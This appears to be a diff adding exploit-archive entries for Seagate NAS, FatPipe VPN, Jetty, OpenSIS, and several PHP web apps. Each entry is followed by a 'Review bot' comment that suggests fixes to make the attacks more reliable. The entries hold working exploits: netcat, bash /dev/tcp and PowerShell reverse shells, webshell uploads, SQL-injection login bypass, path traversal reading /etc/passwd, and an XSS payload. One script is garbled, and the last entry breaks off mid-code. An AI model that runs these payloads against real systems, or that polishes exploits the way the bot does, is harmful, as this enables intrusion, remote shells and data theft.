diff --git a/exploits/hardware/webapps/50132.py b/exploits/hardware/webapps/50132.py
new file mode 100755
index 000000000..4b2aa9629
--- /dev/null
+++ b/exploits/hardware/webapps/50132.py
@@ -0,0 +1,29 @@
+# Exploit Title: Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection
+# Date: 15.07.2021
+# Discovered by: Jeroen - IT Nerdbox
+# Exploit Author: Metin Yunus Kandemir
+# Version: sg2000-2000.1331
+# Vendor Homepage: https://www.seagate.com/
+# Software Link: https://www.seagate.com/tr/tr/support/downloads/item/banas-220-firmware-master-dl/
+
+#!/usr/bin/python3
+
+import requests
+import sys
+
+def exec(target, ncIp, ncPort):
+    print("[!] Please check netcat listener: "+ ncPort)
+    url = "http://" + target + "/backupmgt/localJob.php?session=fail;nc+"+ncIp+"+"+ncPort+"+-e+/bin/sh%00"
+    r = requests.get(url = url)
+    sys.exit(1)
+
+def main(args):
+    if len(args) != 4:
+        print("[*] usage: %s targetIp:port ncIp ncPort" % (args[0]))
+        print("[*] Example:python3 exploit.py 192.168.1.13 192.168.1.22 80")
+        sys.exit(1)
+    exec(target=args[1], ncIp=args[2], ncPort=args[3])
+
+
+if __name__ == "__main__":
+    main(args=sys.argv)
\ No newline at end of file
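Review bot: The `requests.get` on L23 has no `timeout`; because the injected `nc ... -e /bin/sh` is expected to keep the PHP handler busy, the HTTP response may never arrive and the script then blocks indefinitely instead of reaching L24. Wrap it the way the sibling 50439.py does: `try: requests.get(url, timeout=8)` / `except requests.exceptions.ReadTimeout: pass`. The success path also ends in `sys.exit(1)`, which reports failure to the caller — `sys.exit(0)` is the conventional code. The shebang on L15 is not the first line of the file and is therefore inert, and `exec` on L20 shadows a builtin; `trigger` or `run` would be clearer.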
diff --git a/exploits/hardware/webapps/50341.txt b/exploits/hardware/webapps/50341.txt
new file mode 100644
index 000000000..912ef064d
--- /dev/null
+++ b/exploits/hardware/webapps/50341.txt
@@ -0,0 +1,118 @@
+# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)
+# Date: 25.07.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.fatpipeinc.com
+
+FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account (Write Access)
+
+
+Vendor: FatPipe Networks Inc.
+Product web page: https://www.fatpipeinc.com
+Affected version: WARP / IPVPN / MPVPN
+                  10.2.2r38
+                  10.2.2r25
+                  10.2.2r10
+                  10.1.2r60p82
+                  10.1.2r60p71
+                  10.1.2r60p65
+                  10.1.2r60p58s1
+                  10.1.2r60p58
+                  10.1.2r60p55
+                  10.1.2r60p45
+                  10.1.2r60p35
+                  10.1.2r60p32
+                  10.1.2r60p13
+                  10.1.2r60p10
+                  9.1.2r185
+                  9.1.2r180p2
+                  9.1.2r165
+                  9.1.2r164p5
+                  9.1.2r164p4
+                  9.1.2r164
+                  9.1.2r161p26
+                  9.1.2r161p20
+                  9.1.2r161p17
+                  9.1.2r161p16
+                  9.1.2r161p12
+                  9.1.2r161p3
+                  9.1.2r161p2
+                  9.1.2r156
+                  9.1.2r150
+                  9.1.2r144
+                  9.1.2r129
+                  7.1.2r39
+                  6.1.2r70p75-m
+                  6.1.2r70p45-m
+                  6.1.2r70p26
+                  5.2.0r34
+
+Summary: FatPipe Networks invented the concept of router-clustering,
+which provides the highest level of reliability, redundancy, and speed
+of Internet traffic for Business Continuity and communications. FatPipe
+WARP achieves fault tolerance for companies by creating an easy method
+of combining two or more Internet connections of any kind over multiple
+ISPs. FatPipe utilizes all paths when the lines are up and running,
+dynamically balancing traffic over the multiple lines, and intelligently
+failing over inbound and outbound IP traffic when ISP services and/or
+components fail.
+
+FatPipe IPVPN balances load and provides reliability among multiple
+managed and CPE based VPNs as well as dedicated private networks. FatPipe
+IPVPN can also provide you an easy low-cost migration path from private
+line, Frame or Point-to-Point networks. You can aggregate multiple private,
+MPLS and public networks without additional equipment at the provider's
+site.
+
+FatPipe MPVPN, a patented router clustering device, is an essential part
+of Disaster Recovery and Business Continuity Planning for Virtual Private
+Network (VPN) connectivity. It makes any VPN up to 900% more secure and
+300% times more reliable, redundant and faster. MPVPN can take WANs with
+an uptime of 99.5% or less and make them 99.999988% or higher, providing
+a virtually infallible WAN. MPVPN dynamically balances load over multiple
+lines and ISPs without the need for BGP programming. MPVPN aggregates up
+to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
+you need to keep your VPN up and running despite failures of service, line,
+software, or hardware.
+
+Desc: The application has a hidden administrative account 'cmuser' that has
+no password and has write access permissions to the device. The user cmuser
+is not visible in Users menu list of the application.
+
+Tested on: Apache-Coyote/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5684
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
+
+
+30.05.2016
+25.07.2021
+
+--
+
+
+Overview:
+FatPipe Central Manager is a secure web based solution providing a centralized solution
+to manage FatPipe's suite of WAN reliability and optimization products. Central Manager
+allows you to configure, manage and monitor FatPipe's patented MPSec technology at the
+click of a button.
+
+Central Manager = cmuser.
+Once authenticated, you get admin rights.
+
+HTTP/1.1 200 OK
+Server: Apache-Coyote/1.1
+Strict-Transport-Security: max-age=31536000
+X-Frame-Options: DENY
+X-Content-Type-Options: nosniff
+X-XSS-Protection: 1; mode=block
+Content-Type: application/json;charset=ISO-8859-1
+Content-Length: 118
+Date: Fri, 06 Aug 2017 16:37:07 GMT
+Connection: close
+
+{"loginRes":"success","userName":"userName","userAccess":"writeAccess","activeUserName":"cmuser","message":"noError"}
\ No newline at end of file
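Review bot: The PoC on L149–L160 shows only the server's JSON reply and never the request that produced it, so a reader cannot reproduce the `cmuser` login from this advisory alone; the sibling 50342.py in this same change posts `loginParams={"username":...,"password":...,"authType":0}` to `/fpui/loginServlet`, and quoting that request with an empty password here would make the writeup self-contained. `Tested on: Apache-Coyote/1.1` on L123 is a Server header rather than a product build, while the `Date` header on L157 is from 2017; stating which of the listed firmware versions the capture came from would tell readers how current the evidence is.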
diff --git a/exploits/hardware/webapps/50342.py b/exploits/hardware/webapps/50342.py
new file mode 100755
index 000000000..c2109cdc1
--- /dev/null
+++ b/exploits/hardware/webapps/50342.py
@@ -0,0 +1,191 @@
+# Exploit Title: FatPipe Networks MPVPN 10.2.2 - Remote Privilege Escalation
+# Date: 25.07.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.fatpipeinc.com
+
+#!/usr/bin/env python3
+#
+#
+# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation
+#
+#
+# Vendor: FatPipe Networks Inc.
+# Product web page: https://www.fatpipeinc.com
+# Affected version: WARP / IPVPN / MPVPN
+#                   10.2.2r38
+#                   10.2.2r25
+#                   10.2.2r10
+#                   10.1.2r60p82
+#                   10.1.2r60p71
+#                   10.1.2r60p65
+#                   10.1.2r60p58s1
+#                   10.1.2r60p58
+#                   10.1.2r60p55
+#                   10.1.2r60p45
+#                   10.1.2r60p35
+#                   10.1.2r60p32
+#                   10.1.2r60p13
+#                   10.1.2r60p10
+#                   9.1.2r185
+#                   9.1.2r180p2
+#                   9.1.2r165
+#                   9.1.2r164p5
+#                   9.1.2r164p4
+#                   9.1.2r164
+#                   9.1.2r161p26
+#                   9.1.2r161p20
+#                   9.1.2r161p17
+#                   9.1.2r161p16
+#                   9.1.2r161p12
+#                   9.1.2r161p3
+#                   9.1.2r161p2
+#                   9.1.2r156
+#                   9.1.2r150
+#                   9.1.2r144
+#                   9.1.2r129
+#                   7.1.2r39
+#                   6.1.2r70p75-m
+#                   6.1.2r70p45-m
+#                   6.1.2r70p26
+#                   5.2.0r34
+#
+# Summary: FatPipe Networks invented the concept of router-clustering,
+# which provides the highest level of reliability, redundancy, and speed
+# of Internet traffic for Business Continuity and communications. FatPipe
+# WARP achieves fault tolerance for companies by creating an easy method
+# of combining two or more Internet connections of any kind over multiple
+# ISPs. FatPipe utilizes all paths when the lines are up and running,
+# dynamically balancing traffic over the multiple lines, and intelligently
+# failing over inbound and outbound IP traffic when ISP services and/or
+# components fail.
+#
+# FatPipe IPVPN balances load and provides reliability among multiple
+# managed and CPE based VPNs as well as dedicated private networks. FatPipe
+# IPVPN can also provide you an easy low-cost migration path from private
+# line, Frame or Point-to-Point networks. You can aggregate multiple private,
+# MPLS and public networks without additional equipment at the provider's
+# site.
+#
+# FatPipe MPVPN, a patented router clustering device, is an essential part
+# of Disaster Recovery and Business Continuity Planning for Virtual Private
+# Network (VPN) connectivity. It makes any VPN up to 900% more secure and
+# 300% times more reliable, redundant and faster. MPVPN can take WANs with
+# an uptime of 99.5% or less and make them 99.999988% or higher, providing
+# a virtually infallible WAN. MPVPN dynamically balances load over multiple
+# lines and ISPs without the need for BGP programming. MPVPN aggregates up
+# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
+# you need to keep your VPN up and running despite failures of service, line,
+# software, or hardware.
+#
+# Desc: The application suffers from a privilege escalation vulnerability.
+# A normal user (group USER, 0) can elevate her privileges by sending a HTTP
+# POST request and setting the JSON parameter 'privilege' to integer value
+# '1' gaining administrative  rights (group ADMINISTRATOR, 1).
+#
+# Tested on: Apache-Coyote/1.1
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2021-5685
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php
+#
+#
+# 30.05.2016
+# 25.07.2021
+#
+#
+
+import sys
+import time#######
+import requests################
+requests.packages.urllib3.disable_warnings()
+
+if len(sys.argv) !=2:
+    print
+    print("********************************************************")
+    print("*                                                      *")
+    print("* Privilege escalation from USER to ADMINISTRATOR role *")
+    print("*                          in                          *")
+    print("*           FatPipe WARP/IPVPN/MPVPN v10.2.2           *")
+    print("*                                                      *")
+    print("*                     ZSL-2021-5685                    *")
+    print("*                                                      *")
+    print("********************************************************")
+    print("\n[POR] Usage: ./escalator.py [IP]")
+    sys.exit()
+
+ajpi=sys.argv[1]
+print
+juzer=raw_input("[UNE] Username: ")
+pasvord=raw_input("[UNE] Password: ")
+
+sesija=requests.session()
+logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'}
+
+hederi={'Sec-Ch-Ua'       :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"',
+        'Accept'          :'application/json, text/javascript, */*; q=0.01',
+        'X-Requested-With':'XMLHttpRequest',
+        'Sec-Ch-Ua-Mobile':'?0',
+        'User-Agent'      :'Fatnet/1.b',
+        'Content-Type'    :'application/x-www-form-urlencoded; charset=UTF-8',
+        'Origin'          :'https://'+ajpi,
+        'Sec-Fetch-Site'  :'same-origin',
+        'Sec-Fetch-Mode'  :'cors',
+        'Sec-Fetch-Dest'  :'empty',
+        'Referer'         :'https://'+ajpi+'/fpui/dataCollectionServlet',
+        'Accept-Encoding' :'gzip, deflate',
+        'Accept-Language' :'en-US,en;q=0.9',
+        'Connection'      :'close'}
+
+juarel1='https://'+ajpi+'/fpui/loginServlet'
+alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False)
+
+if not 'success' in alo.text:
+    print('[GRE] Login error.')
+    sys.exit()
+else:
+    print('[POR] Authentication successful.')
+
+print('[POR] Climbing the ladder...')
+
+sluba='''
+||    ||       .--._
+||====|| __   '---._)
+||    ||"")\   Q Q )
+||====|| =_/   o  /
+||    || | \_.-;-'-,._
+||====|| |  '  o---o   )
+||    ||  \   /H __H\  /
+||====||   '-' \"")\/  |
+||    ||     _ |_='-)_/
+||====||    /  '.    )
+||    ||   /         /
+||====||  |___/\|   /
+||    ||   |_|  |   |
+||====||  /  )  \\   \\
+||    || (__/    \___\\
+||====||           \_\\
+||    ||           /  )
+||====||          (__/
+'''
+
+for k in sluba:
+    sys.stdout.write(k)
+    sys.stdout.flush()
+    time.sleep(0.01)
+
+juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest'
+posta={
+'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]'
+}
+stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False)
+
+if not 'true' in stanje.text:
+    print('\n[GRE] Something\'s fishy!')
+    sys.exit()
+else:
+    print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.')
+    sys.exit()
\ No newline at end of file
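Review bot: `raw_input` on L289–L290 does not exist in Python 3, so under the `#!/usr/bin/env python3` shebang on L173 the script dies with NameError right after the banner; change both calls to `input(...)`. The bare `print` statements on L274 and L288 are no-ops in Python 3 (they just evaluate the builtin) and should be `print()`. The JSON on L293 and L349 is built by string concatenation, so a username or password containing `"` or `\` corrupts the request body — `json.dumps({'username': juzer, 'password': pasvord, 'authType': 0})` avoids that. `verify=False` on L311/L351 together with `disable_warnings()` on L271 silently accepts any certificate; acceptable for a lab PoC, but worth a one-line comment so it is not copied into tooling. The shebang on L173 is also not on line 1 and is inert.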
diff --git a/exploits/java/webapps/50438.txt b/exploits/java/webapps/50438.txt
new file mode 100644
index 000000000..6e1381860
--- /dev/null
+++ b/exploits/java/webapps/50438.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Jetty 9.4.37.v20210219 - Information Disclosure
+# Date: 2021-10-21
+# Exploit Author: Mayank Deshmukh
+# Vendor Homepage: https://www.eclipse.org/jetty/
+# Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/9.4.37.v20210219/
+# Version: 9.4.37.v20210219 and 9.4.38.v20210224
+# Tested on: Kali Linux
+# CVE : CVE-2021-28164
+
+POC #1 - web.xml
+
+GET /%2e/WEB-INF/web.xml HTTP/1.1
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
\ No newline at end of file
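Review bot: The PoC on L377 gives the request but never says what distinguishes a vulnerable target from a fixed one, so a tester has nothing to compare against; add a line such as `Vulnerable: HTTP 200 with the web.xml body returned; fixed: 404/403 for the same request` (to be confirmed against the two versions listed on L371). It is also worth a caveat that the payload depends on the `%2e` segment reaching Jetty undecoded — a reverse proxy that normalises the path before forwarding is likely to mask the issue; that is inferred from the URL shape, not shown here.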
diff --git a/exploits/php/webapps/50259.txt b/exploits/php/webapps/50259.txt
new file mode 100644
index 000000000..0ac46e09c
--- /dev/null
+++ b/exploits/php/webapps/50259.txt
@@ -0,0 +1,22 @@
+# Exploit Title: OpenSIS 8.0 'modname' - Directory/Path Traversal
+# Date: 09-02-2021
+# Exploit Author: Eric Salario
+# Vendor Homepage: http://www.os4ed.com/
+# Software Link: https://opensis.com/download
+# Version: 8.0
+# Tested on: Windows, Linux
+# CVE: CVE-2021-40651
+
+The 'modname' parameter in the 'Modules.php' is vulnerable to local file inclusion vulnerability. This vulnerability can be exploited to expose sensitive information from arbitrary files in the underlying system.
+
+To exploit the vulnerability, someone must login as the "Parent" user, navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php. The 'modname' parameter and requests the Portal.php's contents. By going back a few directory using '..%2f' decoded as '../' it was possible to disclose arbitrary file from the server's filesystem as long as the application has access to the file.
+
+1. Login as "Parent"
+
+2. Open a web proxy such as BurpSuite and capture the requests
+
+3. Navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login=
+
+4. Check the response
+
+PoC: https://youtu.be/wFwlbXANRCo
\ No newline at end of file
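Review bot: The reproduction on L406 requires a logged-in `Parent` user, yet the title on L393 carries no `(Authenticated)` qualifier, unlike L691 in this same change; add it so the index reflects the precondition. The title says `Directory/Path Traversal` while L402 calls it a local file inclusion; the `/etc/passwd` read on L410 demonstrates file disclosure, so settle on one term and keep it consistent with the CSV description on L824. The trailing `&failed_login=` on L410 is never explained; one sentence saying whether it is required would save the reader a guess.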
diff --git a/exploits/php/webapps/50264.py b/exploits/php/webapps/50264.py
new file mode 100755
index 000000000..28eae8ba2
--- /dev/null
+++ b/exploits/php/webapps/50264.py
@@ -0,0 +1,78 @@
+# Exploit Title: Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload
+# Date: 03/09/2021
+# Exploit Author: a-rey
+# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14928
+# Version: v1.0
+# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0
+# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+import os
+import time
+import logging
+import requests
+import argparse
+
+BANNER = """
+╔═════════════════════════════════════════════════════════════════════════════════════════════════╗
+║ Patient Appointment Scheduler System v1.0 - Unauthenticated File Upload & Remote Code Execution ║
+╚═════════════════════════════════════════════════════════════════════════════════════════════════╝
+ by: \033[0m\033[1;31m █████╗      ██████╗ ███████╗██╗   ██╗\033[0m
+     \033[0m\033[1;32m██╔══██╗     ██╔══██╗██╔════╝██║   ██║\033[0m
+     \033[0m\033[1;33m███████║ ███ ██████╔╝█████╗   ██╗ ██═╝\033[0m
+     \033[0m\033[1;34m██╔══██║     ██╔══██╗██╔══╝     ██╔╝  \033[0m
+     \033[0m\033[1;35m██║  ██║     ██║  ██║███████╗   ██║   \033[0m
+     \033[0m\033[1;36m╚═╝  ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝   \033[0m
+"""
+
+
+def exploit(url:str, file:str, delay:int) -> None:
+  if not os.path.exists(file):
+    logging.error(f'webshell payload "{file}"" does not exist?')
+    return
+  logging.info(f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...')
+  uploadTime = int(time.time())
+  r = requests.post(url + '/classes/SystemSettings.php',
+    files={'img' : (os.path.basename(file), open(file, 'rb'))}, # NOTE: can also use 'cover' field, but this is more inconspicuous
+    params={'f' : 'update_settings'},
+    verify=False
+  )
+  if not r.ok:
+    logging.error('HTTP upload request failed')
+    return
+  logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...')
+  for i in range(uploadTime - delay, uploadTime + delay + 1):
+    r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}', allow_redirects=False)
+    logging.debug(f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...')
+    # NOTE: website will send redirects for all files that do not exist
+    if r.status_code != 302:
+      logging.success(f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}')
+      return
+  logging.error('failed to find payload on target')
+  logging.warning('maybe need a larger delay or uploads directory is not writable?')
+  return
+
+
+if __name__ == '__main__':
+  # parse arguments
+  parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
+  parser.add_argument('-u', '--url',     help='website URL',                                                  type=str, required=True)
+  parser.add_argument('-p', '--payload', help='PHP webshell file to upload',                                  type=str, required=True)
+  parser.add_argument('-d', '--delay',   help='delay (seconds) for file timestamp in payload name on target', type=int, required=False, default=60)
+  parser.add_argument('--debug',         help='enable debugging output',                                      action='store_true', default=False)
+  args = parser.parse_args()
+  # define logger
+  logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG')
+  logging.SUCCESS = logging.CRITICAL + 1
+  logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
+  logging.addLevelName(logging.ERROR,   '\033[0m\033[1;31mFAIL\033[0m')
+  logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
+  logging.addLevelName(logging.INFO,    '\033[0m\033[1;36mINFO\033[0m')
+  logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
+  # print banner
+  print(BANNER)
+  # run exploit
+  exploit(args.url, args.payload, args.delay)
\ No newline at end of file
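Review bot: The upload POST on L459–L463 passes `verify=False`, but the discovery GETs on L469 do not, so against a self-signed HTTPS target the shell uploads and every probe then raises `SSLError` instead of reporting the path; add `verify=False` to the GET and suppress `InsecureRequestWarning` once, as 50342.py does. `open(file, 'rb')` on L460 is never closed; read the bytes under `with open(file, 'rb') as fh: payload = fh.read()` and pass `(os.path.basename(file), payload)` as the file tuple. `logging.success` on L495 reaches into `Logger._log`, a private API; `logging.log(logging.SUCCESS, msg)` does the same through the public one. The shebang on L431 is not the first line and is inert.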
diff --git a/exploits/php/webapps/50326.txt b/exploits/php/webapps/50326.txt
new file mode 100644
index 000000000..bfb9ee9a3
--- /dev/null
+++ b/exploits/php/webapps/50326.txt
@@ -0,0 +1,52 @@
+# Exploit Title: Budget and Expense Tracker System 1.0 - Arbitrary File Upload
+# Exploit Author: ()t/\/\1
+# Date: 23/09/2021
+# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
+# Tested on: Linux
+# Version: 2.0
+
+# Exploit Description:
+The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.
+
+
+# PoC request
+
+POST /expense_budget/classes/Users.php?f=save HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/expense_budget/admin/?page=user
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------1399170066243244238234165712
+Content-Length: 824
+Connection: close
+Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
+
+-----------------------------1399170066243244238234165712
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------1399170066243244238234165712
+Content-Disposition: form-data; name="firstname"
+
+A
+-----------------------------1399170066243244238234165712
+Content-Disposition: form-data; name="lastname"
+
+a
+-----------------------------1399170066243244238234165712
+Content-Disposition: form-data; name="username"
+
+admin
+-----------------------------1399170066243244238234165712
+Content-Disposition: form-data; name="password"
+
+
+-----------------------------1399170066243244238234165712
+Content-Disposition: form-data; name="img"; filename="na3na3.php"
+Content-Type: image/jpeg
+
+<?php echo "<pre>";system($_GET['cmd']); ?>
+-----------------------------1399170066243244238234165712--
\ No newline at end of file
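Review bot: `# Version: 2.0` on L512 contradicts the title on L507 (`1.0`), and the vendor link on L510 gives no version, so one of the two is wrong; reconcile them. The request on L520–L531 carries a `PHPSESSID` cookie and a `Referer` into `/admin/?page=user`, so this is an upload performed from an authenticated admin session; the title should say `(Authenticated)` as L691 does, or the text should explain why the session is not needed. The PoC also stops at the upload — stating where `na3na3.php` is stored and the URL used to invoke `?cmd=` would complete it.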
diff --git a/exploits/php/webapps/50350.txt b/exploits/php/webapps/50350.txt
new file mode 100644
index 000000000..e27954ca5
--- /dev/null
+++ b/exploits/php/webapps/50350.txt
@@ -0,0 +1,13 @@
+# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)
+# Date: 2/3/2021
+# Author: 0xB9
+# Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip
+# Version: 1.3.0
+# Tested on: Windows 10
+# CVE: CVE-2021-24286
+
+1. Description:
+This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS.
+
+2. Proof of Concept:
+wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
\ No newline at end of file
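Review bot: The PoC on L578 is a `wp-admin` URL, so it only fires when an authenticated administrator opens the link, and the title on L566 should carry `(Authenticated)` or at least state that precondition. The payload binds `onanimationstart` to `animation-name:rotation`, which fires only if a `@keyframes rotation` rule exists on the page — presumably one shipped with the admin stylesheet, but that should be confirmed and stated, since the payload is otherwise silent. The date `2/3/2021` on L567 is ambiguous between February and March; other entries in this change use ISO or `dd.mm.yyyy`.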
diff --git a/exploits/php/webapps/50439.py b/exploits/php/webapps/50439.py
new file mode 100755
index 000000000..abc88f87f
--- /dev/null
+++ b/exploits/php/webapps/50439.py
@@ -0,0 +1,98 @@
+# Exploit Title: Clinic Management System 1.0 - SQL injection to Remote Code Execution
+# Date:21/10/2021
+# Exploit Author: Pablo Santiago
+# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
+# Version: 1.0
+# Tested on: Windows 7 and Ubuntu 21.10
+# References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e
+
+# Vulnerability: Through SQL injection to bypass the login form it is
+possible to upload a malicious file and after use that malicious file to
+execute code in the remote system.
+# Proof of Concept:
+
+import requests
+import sys
+import time
+
+
+session = requests.Session()
+#http_proxy  = "http://127.0.0.1:8080"
+#https_proxy = "https://127.0.0.1:8080"
+
+#proxyDict = {"http"  : http_proxy,
+#         "https" : https_proxy}
+
+def windows(HPW,host,shell_name):
+payload =
+"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
+host2 = host+'/'+'uploadImage/Logo/' + shell_name + '.php?cmd='+payload
+#print(payload)
+try:
+request_rce = requests.get(host2,timeout=8)
+except requests.exceptions.ReadTimeout:
+pass
+
+
+def linux(HPL,host,shell_name):
+payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+HPL+'+0>%261"'
+host2 = host+'/'+'/uploadImage/Logo/' + shell_name + '.php?cmd='+payload
+#print(payload)
+try:
+request_rce = requests.get(host2,timeout=8)
+except requests.exceptions.ReadTimeout:
+pass
+
+def main():
+
+host = sys.argv[1]
+shell_name = sys.argv[2]
+url = host + '/login.php'
+values = {'user': "admin",
+ 'email': "' OR 1 -- -",
+         'password': '',
+         'btn_login': ""
+         }
+
+r = session.post(url, data=values)
+cookie = session.cookies.get_dict()['PHPSESSID']
+
+data = { 'btn_web':''}
+headers= {'Cookie': 'PHPSESSID='+cookie}
+
+
+
+request = session.post(host+ '/manage_website.php', data=data,
+headers=headers,files={"website_image":(shell_name+'.php',"<?=`$_GET[cmd]`?>")})
+print("")
+print('[*] Your Simple Webshell was uploaded to ' + host +
+'/uploadImage/Logo/' + shell_name + '.php' )
+print("")
+LHOST = input('[+] Enter your LHOST: ')
+LPORT = input('[+] Enter your LPORT: ')
+print("")
+HPW= "'"+LHOST+"'"+','+LPORT
+HPL= ""+LHOST+""+'/'+LPORT
+
+print('[+] Option 1: Windows')
+print('[+] Option 2: Linux')
+
+option = input('[+] Choose OS: ')
+
+if option == "1":
+
+windows(HPW,host,shell_name)
+exit()
+
+elif option == "2":
+linux(HPL,host,shell_name)
+exit()
+
+else:
+print("Please choose Windows or Linux")
+
+main()
+
+#Usage: python3 host shell_name
+#Example: python3 http://localhost/clinic shell
\ No newline at end of file
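Review bot: The file cannot be parsed: L596–L597 continue a comment without `#`, every function body (L613–L620, L624–L630, L634–L679) sits at column 0, and the `payload =` assignment on L613–L614 is split across two lines with no continuation, so `python3 50439.py` exits with SyntaxError before the login is attempted. This looks like mail-client re-wrapping; the fix is to restore the indentation and rejoin the wrapped lines rather than change any logic. While there, `sys.argv[1]`/`[2]` on L634–L635 are read with no length check, and the usage comment on L682 omits the script name (`python3 50439.py host shell_name`). `HPL` on L661 is embedded into a URL on L624 with no encoding, which is fine for a numeric host/port but breaks on anything else.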
diff --git a/exploits/php/webapps/50440.txt b/exploits/php/webapps/50440.txt
new file mode 100644
index 000000000..5cc214d29
--- /dev/null
+++ b/exploits/php/webapps/50440.txt
@@ -0,0 +1,116 @@
+# Exploit Title: Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated)
+# Exploit Author: Sam Ferguson (@AffineSecurity) and Drew Jones (@qhum7sec)
+# Date: 2021-10-21
+# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
+# Version: 1.0
+# Tested On: Windows 10 + XAMPP + Python 3
+
+# Vulnerability: An attacker can perform a blind boolean-based SQL injection attack, which can provide attackers
+#                with access to the username and md5 hash of any administrators.
+# Vulnerable file: /online-course-registration/Online/pincode-verification.php
+# Proof of Concept:
+
+#!/usr/bin/python3
+
+import requests
+import sys
+import string
+
+def exploit(hostname, username, password):
+
+   # Building bruteforce list
+    pass_list = list(string.ascii_lowercase)
+    pass_list += list(range(0,10))
